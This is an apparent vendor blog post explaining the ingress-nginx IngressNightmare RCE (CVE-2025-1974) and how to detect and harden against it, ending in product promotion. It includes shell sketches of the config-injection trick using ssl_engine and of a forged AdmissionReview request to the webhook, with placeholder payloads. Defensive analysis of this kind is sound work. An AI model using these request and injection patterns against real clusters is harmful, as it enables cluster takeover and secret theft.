Vulnerability Analysis

CVE-2025-1974 Ingress NGINX Controller RCE

IngressNightmare - CVE-2025-1974 in Kubernetes ingress-nginx - gave unauthenticated attackers cluster-wide RCE. Here is how it worked and what to harden now.

Shadab Khan
Security Engineer
8 min read

CVE-2025-1974, disclosed by Wiz researchers under the IngressNightmare brand in March 2025, was the worst Kubernetes bug of the year by blast radius. A default installation of ingress-nginx let an unauthenticated attacker on the pod network execute code inside the controller, and the controller's privileges translated to full cluster compromise. The Kubernetes security team assigned it a 9.8 CVSS for good reason.

This post is the engineer-level breakdown: the root cause in NGINX configuration templating, how the exploit chain reached RCE, what made default installs so exposed, and what operators should do beyond patching.

What is CVE-2025-1974 and why is it called IngressNightmare?

CVE-2025-1974 is an unauthenticated remote code execution vulnerability in the admission controller of the Kubernetes ingress-nginx project, and Wiz named it IngressNightmare because default configurations exposed the admission webhook on the pod network with no authentication. The admission controller exists to validate Ingress resources before they are applied. When a user creates or updates an Ingress, the Kubernetes API server calls the webhook, which renders a test NGINX configuration to check validity.

The rendering step was the problem. The controller fed annotation values from the candidate Ingress into the NGINX configuration template, and a subset of annotations allowed attacker-controlled text to land in a position where NGINX's ssl_engine directive would load a shared library. An attacker who could reach the admission webhook directly - not through the API server - could submit a crafted AdmissionReview that caused the controller to load an arbitrary .so file and execute the attacker's code.
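The injection pattern can be sketched locally. This is illustrative only: the controller's real template text and annotation handling differ, and the real payload pointed `ssl_engine` at a `/proc/<pid>/fd/<n>` path holding the attacker's uploaded shared object rather than a fixed filename.

```shell
# Hypothetical annotation value: closes the quoted directive it lands in,
# then smuggles in an ssl_engine directive of its own.
ANNOT='CN=example";
ssl_engine /tmp/attacker.so;
# trailing text to re-balance the original directive: "'

# Emulate the vulnerable step: raw annotation text interpolated into the
# test configuration that the webhook hands to `nginx -t`.
cat > /tmp/rendered.conf <<EOF
ssl_verify_client optional;
if (\$ssl_client_s_dn ~ "${ANNOT}") { return 403; }
EOF

# The smuggled directive survives rendering intact.
grep -n 'ssl_engine' /tmp/rendered.conf
```

Because NGINX resolves `ssl_engine` during config parsing, the directive fires even in a validation-only run; the attacker never needs the config to be deployed.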

The name captures the operational reality: on a default install of ingress-nginx, the webhook listens on port 8443 on the pod network and accepts any AdmissionReview payload without verifying the request actually came from the API server. That is a single TCP connection away from RCE for anyone with pod-network access.

How does the exploit chain work?

The exploit chain works by sending a forged admission review to the webhook with an Ingress that contains attacker-controlled annotations, then triggering the vulnerable NGINX configuration parse. Wiz's write-up covers five CVEs disclosed together, with CVE-2025-1974 as the capstone that turns annotation injection into RCE:

  1. The attacker stages a shared object on the controller pod's filesystem. The simpler path abuses NGINX's client-body buffering: a large enough request body gets spooled to a temporary file on disk, and that file remains reachable through the worker process's /proc/<pid>/fd entries at a guessable path.
  2. The attacker sends an AdmissionReview HTTPS request to the controller's webhook with an Ingress whose annotations include a field such as auth-tls-match-cn carrying NGINX configuration fragments.
  3. The webhook renders the test configuration, which now contains ssl_engine pointing at the uploaded shared object.
  4. NGINX loads the shared object at config-parse time and the attacker's code executes inside the controller pod.

None of these steps require authentication. The API server is not involved. The attacker only needs network reachability to the webhook TCP port.
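The forged request from step 2 can be sketched as follows. The annotation value is a placeholder rather than a working payload, and the endpoint path shown follows the default ValidatingWebhookConfiguration; verify it against your own cluster's webhook config before relying on it.

```shell
# Forged AdmissionReview carrying a malicious Ingress. A real exploit puts
# NGINX directives in the annotation value; here it is a harmless placeholder.
cat > /tmp/review.json <<'EOF'
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "uid": "00000000-0000-0000-0000-000000000000",
    "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
    "operation": "CREATE",
    "object": {
      "apiVersion": "networking.k8s.io/v1",
      "kind": "Ingress",
      "metadata": {
        "name": "poc",
        "annotations": {
          "nginx.ingress.kubernetes.io/auth-tls-match-cn": "CN=placeholder-injection"
        }
      },
      "spec": {"rules": [{"host": "poc.example"}]}
    }
  }
}
EOF

# Delivery: the webhook accepts this over HTTPS with no client authentication
# and no check that the caller is the API server. Never run this against a
# cluster you do not own.
# curl -ks -X POST "https://<controller-pod-ip>:8443/networking/v1/ingresses" \
#   -H 'Content-Type: application/json' --data @/tmp/review.json
```

The notable part is what is absent: no bearer token, no client certificate, no API-server identity of any kind.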

Once inside the controller pod, the attacker has the controller's service account token, which in a default install carries get and list on secrets cluster-wide. That permission is all an attacker needs to read every secret in the cluster, including cloud credentials, database passwords, and service-account tokens for every workload.

Which clusters were actually exposed?

Any cluster running ingress-nginx prior to v1.11.5 or v1.12.1, with the admission webhook enabled (the default), and with pod-to-pod network reachability to the controller (also the default), was exposed. Wiz estimated that more than 40 percent of cloud environments ran a vulnerable version at disclosure, a figure consistent with Helm chart install-base telemetry.
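Assuming controller image tags follow the usual vX.Y.Z scheme, a quick local check of whether a given tag falls in the vulnerable range looks like this; compare it against the image tags actually running in your clusters.

```shell
# Classify an ingress-nginx controller tag against the fixed releases:
# v1.11.5 for the 1.11 line, v1.12.1 for the 1.12 line.
is_vulnerable() {
  tag="${1#v}"                       # v1.12.0 -> 1.12.0
  case "$tag" in
    1.12.*) fixed="1.12.1" ;;
    *)      fixed="1.11.5" ;;        # 1.11 line and anything older
  esac
  # Vulnerable when the tag sorts strictly before the fixed release.
  [ "$(printf '%s\n%s\n' "$tag" "$fixed" | sort -V | head -n1)" = "$tag" ] &&
    [ "$tag" != "$fixed" ]
}

is_vulnerable v1.12.0 && echo "v1.12.0: vulnerable"
is_vulnerable v1.12.1 || echo "v1.12.1: patched"
```

Newer minor lines (1.13 and up) sort after both fixed releases and correctly classify as patched.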

The bug does not require the ingress controller to be internet-facing. The attack surface is the pod network, which means a single compromised workload, a leaky tenant in a shared cluster, or a CI runner with cluster access could reach the webhook. Multi-tenant clusters operated by platform teams were the highest-risk configuration because any tenant workload could take over the entire cluster.

Four companion CVEs shipped alongside 1974: CVE-2025-1097, 1098, 24513, and 24514, each closing a different annotation-injection or file-handling path. The patched versions strictly validate the annotation values that can reach the configuration template.

What should have prevented this in the first place?

What should have prevented this is the security boundary between untrusted tenant data and trusted control-plane config rendering - a boundary that the admission controller architecture blurred by design. Admission webhooks are invoked with the full candidate object as input, and treating that object as trusted input during config templating was the root mistake. The patch tightens the templating path, but the pattern of "parse untrusted user input as NGINX config to validate it" is inherently dangerous.

A cleaner design would generate the test configuration from a sanitized, typed representation of the annotations rather than interpolating user text directly. Several ingress implementations do exactly that. The ingress-nginx project inherited the templating pattern from earlier versions when annotations were a small, auditable set; as the supported annotation list grew past 100 entries, the attack surface grew with it.

There is a broader point about admission controllers generally: any admission webhook that does expensive, semantic validation of submitted resources is a privileged code path that receives untrusted input, and operators should treat it with the same rigor as a public API. That means authentication of webhook callers, strict allowlists on what annotations can contain, and defense in depth when the rendering step is non-trivial.

How do I detect exploitation after the fact?

Detecting exploitation after the fact is possible but not easy, because the on-cluster artifacts are largely inside the controller pod's ephemeral filesystem. The signals worth pulling:

  • Controller pod logs showing admission review requests from pod IPs rather than the API server's IP range.
  • Unexpected shared objects under the NGINX client-body temp path or the controller's config directory.
  • Outbound connections from the controller pod to destinations outside your image registry and DNS.
  • API server audit logs showing get or list on secrets with the controller's service account, especially at high volume over a short window.

Cloud providers with managed Kubernetes services published cluster-level detections within a week of disclosure. If you run self-hosted clusters, the retrospective exercise is to grep audit logs for the ingress-nginx service account's activity around March 2025 and verify that it matches expected baseline volume. Spikes are the most reliable signal.
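A minimal sketch of that audit sweep. The service-account username assumes the default Helm release (ingress-nginx in the ingress-nginx namespace), the field names follow the standard Kubernetes audit Event schema, and the sample log line is fabricated to stand in for your real audit log:

```shell
# Fabricated sample audit event; substitute your real audit log path.
cat > /tmp/audit.log <<'EOF'
{"kind":"Event","verb":"list","user":{"username":"system:serviceaccount:ingress-nginx:ingress-nginx"},"objectRef":{"resource":"secrets"},"requestReceivedTimestamp":"2025-03-24T11:02:17Z"}
EOF

# Count secret reads by the controller's service account; compare the
# count against your expected baseline volume for the same window.
grep 'system:serviceaccount:ingress-nginx:ingress-nginx' /tmp/audit.log \
  | grep '"resource":"secrets"' \
  | grep -cE '"verb":"(get|list)"'
```

Bucketing the counts per hour (for example with the timestamp prefix as a grouping key) makes the spike pattern described above stand out.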

If you confirm exploitation, treat every secret in the cluster as disclosed. Rotating only the secrets you know were read is not sufficient because the controller's permissions covered every namespace.

What should I do now if I still run ingress-nginx?

If you still run ingress-nginx, upgrade to v1.11.5 or v1.12.1 at minimum, verify that the admission webhook is not reachable from tenant workloads, and audit the controller's RBAC to remove cluster-wide secret access if your use case does not require it. Beyond patching, three structural improvements are worth the effort:

  1. Apply a NetworkPolicy that restricts ingress to the webhook port so only the API server's egress IPs can reach it. This is an explicitly supported control and closes the attack path even if a new variant lands.
  2. Review your ingress-nginx RBAC. The default bindings were built for convenience, not least privilege. Narrowing secrets access to specific namespaces eliminates the worst-case blast radius.
  3. Decide whether ingress-nginx is the right choice for your workload profile. Several alternatives with smaller attack surfaces exist, including Contour, Traefik, and cloud-provider native load balancer controllers. Switching is not trivial, but the bug class is not specific to 1974 and will recur.
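Item 1 above might be sketched as the following config fragment. It assumes a default Helm install (namespace ingress-nginx, standard labels), and the control-plane CIDR is a placeholder you must replace; on managed clusters the API server often reaches pods from an address range outside the pod CIDR, so verify the real source range before enforcing.

```shell
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ingress-nginx-webhook-lockdown
  namespace: ingress-nginx
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: ingress-nginx
  policyTypes: ["Ingress"]
  ingress:
    # Keep normal proxy traffic flowing: the policy default-denies every
    # other port on the selected pods once it matches them.
    - ports:
        - {protocol: TCP, port: 80}
        - {protocol: TCP, port: 443}
    # Webhook port: API-server egress range only (placeholder CIDR).
    - from:
        - ipBlock:
            cidr: 203.0.113.0/24
      ports:
        - {protocol: TCP, port: 8443}
EOF
```

Test from a scratch pod afterward: a connection to port 8443 from a tenant workload should time out while ports 80 and 443 still answer.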

If you cannot patch immediately, Kubernetes SIG Security documented a mitigation: disable the admission webhook, with the tradeoff of losing Ingress validation until the upgrade lands.
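For Helm-managed installs, the chart exposes a value that turns the webhook off; the release and repo names below assume the standard install and may differ in yours. This is a stopgap, not a fix.

```shell
# Stopgap only: disables the validating admission webhook entirely,
# closing the unauthenticated RCE path at the cost of Ingress validation.
helm upgrade ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx --reuse-values \
  --set controller.admissionWebhooks.enabled=false
```

Re-enable the webhook as part of the same change that lands the patched controller version, or you will silently lose config validation long-term.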

How Safeguard.sh Helps

Safeguard.sh reachability analysis would have ranked CVE-2025-1974 against your actual cluster configuration - whether the webhook was exposed to pod networks, which RBAC paths to secrets existed, which clusters ran affected chart versions - and reduced raw CVE noise by 60 to 80 percent so operators patched the truly exposed clusters first. Griffin AI autonomous remediation can stage the chart upgrade, apply the NetworkPolicy constraints, and verify the webhook is no longer reachable from non-API-server sources without a 30-ticket migration. Eagle malware classification fingerprints post-exploitation shared objects and cryptominer payloads dropped in follow-on campaigns. SBOM generation with 100-level dependency depth surfaces every ingress-nginx version running across your clusters, container self-healing restores controller pods to a clean state, and TPRM extends the same visibility to managed Kubernetes vendors in your supply chain.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.